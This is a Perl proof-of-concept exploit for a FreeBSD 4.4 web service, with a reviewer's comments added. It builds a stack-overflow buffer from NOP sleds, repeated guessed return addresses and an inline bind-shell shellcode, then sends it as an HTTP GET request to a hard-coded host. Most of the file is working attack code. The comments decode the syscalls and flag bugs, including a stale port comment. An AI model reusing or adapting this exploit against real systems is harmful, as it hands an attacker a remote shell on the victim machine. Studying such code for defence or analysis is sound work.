#!/usr/bin/perl
#
# This piece of code may not be distributed without
# My explicit permission (zilli0n@gmx.net) !
#
# For educational use only !
#
# Written for FreeBSD 4.4-STABLE
#
# Reviewer summary: this is a stack-overflow proof-of-concept. It builds a
# 787-byte request target (592 NOPs, 8 copies of one guessed return address,
# 4 more copies, 27 NOPs, then a 120-byte bind-shell payload), sends it as a
# single "GET <buffer> HTTP/1.0" line to a hard-coded host:port over TCP, and
# closes the socket without reading a reply. Nothing here verifies that the
# target is reachable, vulnerable, or that the address guess is right.
#
# NOTE(review): no `use strict;` / `use warnings;` -- every variable below is
# an undeclared package global, and $buffer is never initialised (its
# initialisers are commented out), so the first `.=` appends to undef.
use IO::Socket;

# Region sizes. The first region is 592 NOP bytes followed by 32 bytes of
# return address; the second is 16 bytes of return address followed by
# (147 - length($shellcode)) NOP bytes and the shellcode itself.
$size1 = 624 - 32;
$size2 = 163 - 16;

#$a = "A" x $size1;
#$b = "B" x $size2;
#$buffer = "$a$b";

# Written by MayheM binds a shell to port 31337
#
# NOTE(review): the port in the comment above does not appear to match the
# bytes. The 16-bit store `\x66\xc7\x46\x0a\xaa\xaa` looks like it writes
# 0xaaaa (43690) into the sockaddr port field, not 0x7a69 (31337); treat the
# comment as stale until confirmed by disassembling the payload.
# The `\xb0 NN \xcd\x80` pairs appear to be FreeBSD i386 syscalls (fork=2,
# socket=97, bind=104, listen=106, accept=30, dup2=90, execve=59) and the
# trailing 7 bytes are the ASCII string "/bin/sh". The `mov [esi+N]` stores
# at offsets 7..0x0c presumably build the sockaddr just past the end of the
# payload, i.e. the shellcode writes scratch data beyond its own bytes --
# confirm against the target's stack layout before relying on it.
$shellcode =
    "\xeb\x6a\x5e\x31\xc0\x31\xdb\x88\x46\x07\xb0\x02\xcd\x80\x6a".
    "\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6".
    "\x46\x09\x02\x66\xc7\x46\x0a\xaa\xaa\x89\x46\x0c\x6a\x10\x8d".
    "\x46\x08\x50\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31".
    "\xc0\xb0\x6a\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd".
    "\x80\xb1\x03\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a".
    "\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b".
    "\x50\xcd\x80\xe8\x91\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

$nop = "\x90";

# Guessed stack address plus a small fudge; the sum is packed once and reused
# for every return-address slot.
# NOTE(review): pack('l') is host-native byte order, so the 4 bytes come out
# little-endian only on an x86 host; on a big-endian host the script would
# silently send the wrong bytes. The sum (0xbfbffa26) is also above the
# signed 32-bit range, so this relies on pack wrapping it -- 'V' would make
# both the width and the byte order explicit. $offset is a string ("30")
# that Perl coerces to a number; it should simply be written as 30.
$esp = 0xbfbffa08;
$offset = "30";
print("New return address: 0x", sprintf('%lx',($esp + $offset)), "\n");
$nret = pack('l', ($esp + $offset));

##########################################################################
#
# Filling first part of the buffer with nops and return addresses.
#
# 592 NOP bytes.
for ($i = 0; $i < $size1; $i++) {
    $buffer .= $nop;
}
# 32 bytes = 8 copies of the 4-byte return address.
for ($i = 0; $i < 32; $i += 4) {
    $buffer .= $nret;
}

##########################################################################
#
# Filling our second part with the return addresses nops and shellcode
#
# 16 bytes = 4 more copies of the return address.
for ($i = 0; $i < 16; $i += 4) {
    $buffer .= $nret;
}
# Top up with NOPs so this region is exactly $size2 bytes once the shellcode
# is appended. Nothing checks that $size2 >= length($shellcode); if the
# payload were ever longer, the loop would run zero times and the total
# buffer length would silently exceed 787.
for ($i = 0; $i < ($size2 - length($shellcode)); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;

##########################################################################
#
# Make a socket connection and send our buffer
#
$lbuffer = length($buffer);
print "Buffer is ready: $lbuffer bytes\n";

# NOTE(review): the target host and port are hard-coded (an RFC 1918
# address), and `new IO::Socket::INET (...)` is indirect-object syntax; the
# conventional form is IO::Socket::INET->new(...). No Timeout => is passed,
# so a connect to an unreachable host may block for the OS default. $sock is
# the only lexical in the script; everything else is a package global.
my $sock = new IO::Socket::INET (
    PeerAddr => '10.5.12.34',
    PeerPort => '8000',
    Proto => 'tcp',
);
die "Could not create socket: $! \n" unless $sock;

# The whole payload goes out as the request target of one HTTP/1.0 request
# line terminated by a bare "\n" (no CRLF, no blank line). The socket is
# closed without reading any response, so whether the overflow succeeded is
# not observable from this script.
print $sock "GET $buffer HTTP/1.0\n";
close($sock);